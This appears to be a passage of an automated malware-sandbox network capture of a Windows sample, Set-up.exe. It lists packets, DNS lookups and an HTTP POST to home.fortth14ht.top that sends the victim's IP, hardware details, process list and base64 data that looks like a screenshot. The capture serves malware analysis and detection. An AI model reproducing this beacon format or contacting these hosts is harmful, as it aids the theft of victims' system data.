                                                                                                                                                                      Dec 28, 2024 09:34:01.556329012 CET49743443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:01.556406021 CET44349743172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:01.556499958 CET49743443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:01.556883097 CET49743443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:01.556902885 CET44349743172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:02.816379070 CET44349743172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:02.816452026 CET49743443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:02.818104029 CET49743443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:02.818109989 CET44349743172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:02.818407059 CET44349743172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:02.819655895 CET49743443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:02.819772959 CET49743443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:02.819806099 CET44349743172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:03.735380888 CET44349743172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:03.735486984 CET44349743172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:03.735553026 CET49743443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:03.735745907 CET49743443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:03.735764980 CET44349743172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:04.053704977 CET49744443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:04.053769112 CET44349744172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:04.053853035 CET49744443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:04.054279089 CET49744443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:04.054285049 CET44349744172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:05.267858028 CET44349744172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:05.267952919 CET49744443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:05.269292116 CET49744443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:05.269304037 CET44349744172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:05.269561052 CET44349744172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:05.270870924 CET49744443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:05.271048069 CET49744443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:05.271080017 CET44349744172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:05.271332026 CET49744443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:05.271341085 CET44349744172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:06.205099106 CET44349744172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:06.205246925 CET44349744172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:06.205338955 CET49744443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:06.205478907 CET49744443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:06.205498934 CET44349744172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:06.409842968 CET49745443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:06.409912109 CET44349745172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:06.409975052 CET49745443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:06.410305977 CET49745443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:06.410326004 CET44349745172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:07.623208046 CET44349745172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:07.623320103 CET49745443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:07.624641895 CET49745443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:07.624655962 CET44349745172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:07.624921083 CET44349745172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:07.626200914 CET49745443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:07.626296043 CET49745443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:07.626302958 CET44349745172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:08.468226910 CET44349745172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:08.468344927 CET44349745172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:08.468401909 CET49745443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:08.468553066 CET49745443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:08.468575001 CET44349745172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:08.782828093 CET49747443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:08.782876015 CET44349747172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:08.782996893 CET49747443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:08.783293009 CET49747443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:08.783308029 CET44349747172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:09.995421886 CET44349747172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:09.995548964 CET49747443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:09.996809959 CET49747443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:09.996826887 CET44349747172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:09.997072935 CET44349747172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:09.998596907 CET49747443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:09.999278069 CET49747443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:09.999308109 CET44349747172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:09.999432087 CET49747443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:09.999459982 CET44349747172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:09.999573946 CET49747443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:09.999603987 CET44349747172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:09.999742031 CET49747443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:09.999780893 CET44349747172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:09.999948978 CET49747443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:09.999989033 CET44349747172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:10.000152111 CET49747443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:10.000190973 CET44349747172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:10.000200033 CET49747443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:10.000217915 CET44349747172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:10.000385046 CET49747443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:10.000420094 CET44349747172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:10.000442982 CET49747443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:10.000576019 CET49747443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:10.000621080 CET49747443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:10.043343067 CET44349747172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:10.043565035 CET49747443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:10.043618917 CET49747443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:10.043642998 CET49747443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:10.091336966 CET44349747172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:10.091434956 CET49747443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:10.139333010 CET44349747172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:12.297753096 CET44349747172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:12.297866106 CET44349747172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:12.298001051 CET49747443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:12.298161983 CET49747443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:12.298182964 CET44349747172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:12.301430941 CET49754443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:12.301474094 CET44349754172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:12.301681995 CET49754443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:12.301842928 CET49754443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:12.301856041 CET44349754172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:13.558530092 CET44349754172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:13.558666945 CET49754443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:13.559942007 CET49754443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:13.559954882 CET44349754172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:13.560199022 CET44349754172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:13.561542988 CET49754443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:13.561561108 CET49754443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:13.561609030 CET44349754172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:14.403045893 CET44349754172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:14.403094053 CET44349754172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:14.403121948 CET44349754172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:14.403184891 CET44349754172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:14.403196096 CET49754443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:14.403215885 CET44349754172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:14.403266907 CET49754443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:14.403270006 CET44349754172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:14.403287888 CET44349754172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:14.403331995 CET49754443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:14.407386065 CET44349754172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:14.408623934 CET49754443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:14.408634901 CET44349754172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:14.415153027 CET44349754172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:14.417190075 CET49754443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:14.417198896 CET44349754172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:14.429748058 CET44349754172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:14.429905891 CET44349754172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:14.429972887 CET49754443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:14.430114985 CET49754443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:14.430114985 CET49754443192.168.2.4172.67.128.184
                                                                                                                                                                      Dec 28, 2024 09:34:14.430140972 CET44349754172.67.128.184192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:34:14.430152893 CET44349754172.67.128.184192.168.2.4
                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                      Dec 28, 2024 09:33:14.361778975 CET5214953192.168.2.41.1.1.1
                                                                                                                                                                      Dec 28, 2024 09:33:14.366281986 CET5214953192.168.2.41.1.1.1
                                                                                                                                                                      Dec 28, 2024 09:33:14.506880999 CET53521491.1.1.1192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:14.657957077 CET53521491.1.1.1192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:21.191634893 CET5853453192.168.2.41.1.1.1
                                                                                                                                                                      Dec 28, 2024 09:33:21.420614958 CET53585341.1.1.1192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:28.177090883 CET5853553192.168.2.41.1.1.1
                                                                                                                                                                      Dec 28, 2024 09:33:28.177155972 CET5853553192.168.2.41.1.1.1
                                                                                                                                                                      Dec 28, 2024 09:33:28.317101002 CET53585351.1.1.1192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:28.582254887 CET53585351.1.1.1192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:35.037051916 CET5390553192.168.2.41.1.1.1
                                                                                                                                                                      Dec 28, 2024 09:33:35.180514097 CET53539051.1.1.1192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:36.184859037 CET5390653192.168.2.41.1.1.1
                                                                                                                                                                      Dec 28, 2024 09:33:36.184921980 CET5390653192.168.2.41.1.1.1
                                                                                                                                                                      Dec 28, 2024 09:33:36.331062078 CET53539061.1.1.1192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:36.331084013 CET53539061.1.1.1192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:38.921946049 CET5390853192.168.2.41.1.1.1
                                                                                                                                                                      Dec 28, 2024 09:33:38.922015905 CET5390853192.168.2.41.1.1.1
                                                                                                                                                                      Dec 28, 2024 09:33:39.062757969 CET53539081.1.1.1192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:39.062920094 CET53539081.1.1.1192.168.2.4
                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                      Dec 28, 2024 09:33:14.361778975 CET192.168.2.41.1.1.10x120eStandard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                                                                                                                                      Dec 28, 2024 09:33:14.366281986 CET192.168.2.41.1.1.10x68f9Standard query (0)httpbin.org28IN (0x0001)false
                                                                                                                                                                      Dec 28, 2024 09:33:21.191634893 CET192.168.2.41.1.1.10x5c4Standard query (0)yYkNteoVRFthbcESpvExVn.yYkNteoVRFthbcESpvExVnA (IP address)IN (0x0001)false
                                                                                                                                                                      Dec 28, 2024 09:33:28.177090883 CET192.168.2.41.1.1.10x6bc4Standard query (0)home.fortth14ht.topA (IP address)IN (0x0001)false
                                                                                                                                                                      Dec 28, 2024 09:33:28.177155972 CET192.168.2.41.1.1.10x74eaStandard query (0)home.fortth14ht.top28IN (0x0001)false
                                                                                                                                                                      Dec 28, 2024 09:33:35.037051916 CET192.168.2.41.1.1.10x7b8dStandard query (0)spuriotis.clickA (IP address)IN (0x0001)false
                                                                                                                                                                      Dec 28, 2024 09:33:36.184859037 CET192.168.2.41.1.1.10x55a4Standard query (0)home.fortth14ht.topA (IP address)IN (0x0001)false
                                                                                                                                                                      Dec 28, 2024 09:33:36.184921980 CET192.168.2.41.1.1.10xfdf9Standard query (0)home.fortth14ht.top28IN (0x0001)false
                                                                                                                                                                      Dec 28, 2024 09:33:38.921946049 CET192.168.2.41.1.1.10x56c3Standard query (0)home.fortth14ht.topA (IP address)IN (0x0001)false
                                                                                                                                                                      Dec 28, 2024 09:33:38.922015905 CET192.168.2.41.1.1.10xffe3Standard query (0)home.fortth14ht.top28IN (0x0001)false
                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                      Dec 28, 2024 09:33:14.657957077 CET1.1.1.1192.168.2.40x120eNo error (0)httpbin.org3.218.7.103A (IP address)IN (0x0001)false
                                                                                                                                                                      Dec 28, 2024 09:33:14.657957077 CET1.1.1.1192.168.2.40x120eNo error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                                                                                                                                                      Dec 28, 2024 09:33:21.420614958 CET1.1.1.1192.168.2.40x5c4Name error (3)yYkNteoVRFthbcESpvExVn.yYkNteoVRFthbcESpvExVnnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                      Dec 28, 2024 09:33:28.317101002 CET1.1.1.1192.168.2.40x6bc4No error (0)home.fortth14ht.top194.87.58.92A (IP address)IN (0x0001)false
                                                                                                                                                                      Dec 28, 2024 09:33:35.180514097 CET1.1.1.1192.168.2.40x7b8dNo error (0)spuriotis.click172.67.128.184A (IP address)IN (0x0001)false
                                                                                                                                                                      Dec 28, 2024 09:33:35.180514097 CET1.1.1.1192.168.2.40x7b8dNo error (0)spuriotis.click104.21.2.51A (IP address)IN (0x0001)false
                                                                                                                                                                      Dec 28, 2024 09:33:36.331084013 CET1.1.1.1192.168.2.40x55a4No error (0)home.fortth14ht.top194.87.58.92A (IP address)IN (0x0001)false
                                                                                                                                                                      Dec 28, 2024 09:33:39.062920094 CET1.1.1.1192.168.2.40x56c3No error (0)home.fortth14ht.top194.87.58.92A (IP address)IN (0x0001)false
                                                                                                                                                                      • httpbin.org
                                                                                                                                                                      • spuriotis.click
                                                                                                                                                                      • home.fortth14ht.top
                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      0192.168.2.449732194.87.58.92807744C:\Users\user\AppData\Local\Temp\Set-up.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      Dec 28, 2024 09:33:28.703948021 CET12360OUTPOST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1
                                                                                                                                                                      Host: home.fortth14ht.top
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                      Content-Length: 451311
                                                                                                                                                                      Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 32 30 33 34 30 34 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                                                                                                                                                      Data Ascii: { "ip": "8.46.123.189", "current_time": "8532915458317203404", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 988 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 696 }, { "name": "svchost.exe" [TRUNCATED]
                                                                                                                                                                      Dec 28, 2024 09:33:28.823878050 CET9888OUTData Raw: 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 48 5c 2f 77 41 41 52 43 41 51 41 42 51 41 44 41 53 49 41 41 68
                                                                                                                                                                      Data Ascii: QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQH\/wAARCAQABQADASIAAhEBAxEB\/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL\/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFR
                                                                                                                                                                      Dec 28, 2024 09:33:28.823925972 CET2472OUTData Raw: 65 33 38 48 32 65 75 36 46 72 56 74 34 30 38 48 57 66 78 4b 69 74 76 44 50 68 50 56 76 42 76 68 37 77 32 75 75 65 4a 5c 2f 46 6d 68 5c 2f 38 49 31 6f 32 6b 36 35 34 35 2b 49 6d 72 4e 70 39 67 66 44 4a 75 62 61 34 76 76 45 31 7a 4d 49 72 35 62 4d
                                                                                                                                                                      Data Ascii: e38H2eu6FrVt408HWfxKitvDPhPVvBvh7w2uueJ\/Fmh\/8I1o2k6545+ImrNp9gfDJuba4vvE1zMIr5bMRqlmks36+3H7a3hCHwH8H9cf\/AIKj+VF4u8Cazrtr4s\/4Yl1OT\/hY0Nn8Wfid4VbxX\/YI8KlvCH9mXPhq4+H39hSRWz3n\/CDf8JYIWj8TJcT\/ABX\/AMFuQT+1X8PsD\/m3zwr\/AOrH+K9f1r9EDNsTDx6
                                                                                                                                                                      Dec 28, 2024 09:33:28.823951006 CET2472OUTData Raw: 66 6e 5c 2f 41 44 5c 2f 6e 33 70 2b 35 34 6f 39 5c 2f 6e 62 50 4c 6c 38 72 76 35 38 33 61 74 44 59 68 35 5c 2f 63 70 47 6b 6a 37 5c 2f 58 6a 39 50 5c 2f 72 31 57 33 65 57 66 2b 65 33 6c 38 5c 2f 39 4d 4f 5c 2f 35 5c 2f 6c 2b 75 4b 6d 2b 54 79 33
                                                                                                                                                                      Data Ascii: fn\/AD\/n3p+54o9\/nbPLl8rv583atDYh5\/cpGkj7\/Xj9P\/r1W3eWf+e3l8\/9MO\/5\/l+uKm+Ty3Xf6+bH5Xk\/l\/n8KPnbfD0\/e\/8APLr+v06VPv8A938QIW\/vr5f\/AD18uSb\/AFX\/AE6\/59fSjy\/3cyfvESeL93j8v\/1\/\/rqbb5il9m+GT\/Ven\/gJ79PX0qruTb\/Bsj\/e+X\/n\/wCt9PXl9n5\
                                                                                                                                                                      Dec 28, 2024 09:33:28.823965073 CET2472OUTData Raw: 71 34 48 4e 4d 71 6a 6e 58 44 5c 2f 46 32 58 63 4d 5a 7a 6a 4d 42 55 6f 59 79 48 74 4d 54 6b 57 5a 59 6d 68 55 6a 67 73 77 6f 34 6a 44 55 63 4c 69 36 2b 46 77 4e 50 43 34 72 6e 6c 58 6c 39 55 71 30 70 53 6f 61 55 5a 48 2b 6e 76 30 50 2b 41 61 5c
                                                                                                                                                                      Data Ascii: q4HNMqjnXD\/F2XcMZzjMBUoYyHtMTkWZYmhUjgswo4jDUcLi6+FwNPC4rnlXl9Uq0pSoaUZH+nv0P+Aa\/if4bvHZRmscj4o4Mzbi7IMDmsK+CqVMLg+IcswOMpVMZltehiq+KwlHGZhWxGEcaeHg8VRxFOOITdaJ+an7FPxM+JvxG8F\/GEeJdH0jTvhzoF6th8OBo+i6R4fs9MWZNWvtX8Ox2OkWNnBcNY21zot3czsMwXN8
                                                                                                                                                                      Dec 28, 2024 09:33:28.824069977 CET4944OUTData Raw: 53 76 5c 2f 44 4c 50 6a 65 7a 5c 2f 41 47 30 5c 2f 45 2b 73 61 72 38 51 66 2b 46 4e 2b 43 5c 2f 6a 66 5c 2f 62 48 68 57 33 2b 42 76 77 77 73 72 37 77 62 5c 2f 77 41 49 70 34 37 76 74 50 30 6a 54 5c 2f 37 51 31 66 55 4e 44 31 76 5c 2f 41 49 53 47
                                                                                                                                                                      Data Ascii: Sv\/DLPjez\/AG0\/E+sar8Qf+FN+C\/jf\/bHhW3+Bvwwsr7wb\/wAIp47vtP0jT\/7Q1fUND1v\/AISG2mbUrT\/hHv7Nhia21a8dP0u\/4csf8Ezv+jav\/Mx\/H7\/56lfa37Pf7NPwR\/ZV8C3Xw1+AfgW3+H\/gu98Rah4svdIh1vxL4hkvPEWqWemadfard6t4t1rXtaubiWw0bSrJVm1F4YLWwtoLeKKOMLX8JYLKsZ
                                                                                                                                                                      Dec 28, 2024 09:33:28.943166971 CET2472OUTData Raw: 48 6b 59 4e 65 64 6a 78 4a 34 65 49 5a 68 72 32 69 6b 49 57 44 6b 61 70 59 34 51 72 79 77 59 2b 66 68 53 6f 35 59 48 47 4f 39 50 69 38 51 61 46 4f 72 76 42 72 57 6b 54 4a 48 5c 2f 72 48 69 31 4b 7a 6b 56 4f 4d 5c 2f 4f 79 54 45 4c 77 43 66 6d 49
                                                                                                                                                                      Data Ascii: HkYNedjxJ4eIZhr2ikIWDkapY4QrywY+fhSo5YHGO9Pi8QaFOrvBrWkTJH\/rHi1KzkVOM\/OyTELwCfmI456V7+YYbJM5wlXLs1w+V5rgcRG1bA5hSwmOwlePVVcNiY1aNWNntOElr5niZXjOIsgxtHNckxWdZLmOFkpYfMsrrY7Lsbh5tqzo4zCSo16Mm+WzhUi27W6H2t4Z\/bT+LWiadPpWrXMfiSwntZLVkvZBHNh0KB\/
                                                                                                                                                                      Dec 28, 2024 09:33:28.943438053 CET2472OUTData Raw: 66 44 74 6e 38 43 5c 2f 68 68 72 48 78 62 38 55 79 36 35 61 66 45 50 34 48 2b 41 39 59 75 62 54 57 76 43 32 67 36 74 42 34 50 31 7a 77 76 70 6e 69 54 77 74 72 57 74 57 56 78 59 54 61 5c 2f 70 38 45 45 39 37 46 7a 76 67 6a 58 45 2b 49 50 68 5c 2f
                                                                                                                                                                      Data Ascii: fDtn8C\/hhrHxb8Uy65afEP4H+A9YubTWvC2g6tB4P1zwvpniTwtrWtWVxYTa\/p8EE97FzvgjXE+IPh\/wD4i0HU\/B9rpvxF8RftCeGdEGueIdWsruK9\/Zo+BFt+0V8Rp7uGw8K6tCLJ\/h\/cxw6C8F1PPd6+Gs9St9I0zGrnkyTJfoq8IYPMsbGPDccPh8XguJ5YriXDY3E5hklKs54XLqmBx2cYBZ1hsrnXyHE18HGpia
                                                                                                                                                                      Dec 28, 2024 09:33:28.943572998 CET2472OUTData Raw: 47 57 31 46 5a 53 49 6a 4c 58 39 65 35 48 6e 6d 56 38 53 5a 58 68 4d 36 79 58 46 66 58 63 72 78 39 4e 56 73 48 69 31 51 78 47 48 6a 69 4b 4c 66 75 56 61 64 50 46 55 61 46 62 32 56 52 57 6e 53 71 4f 6d 6f 56 71 63 6f 56 61 54 6e 54 6e 47 62 5c 2f
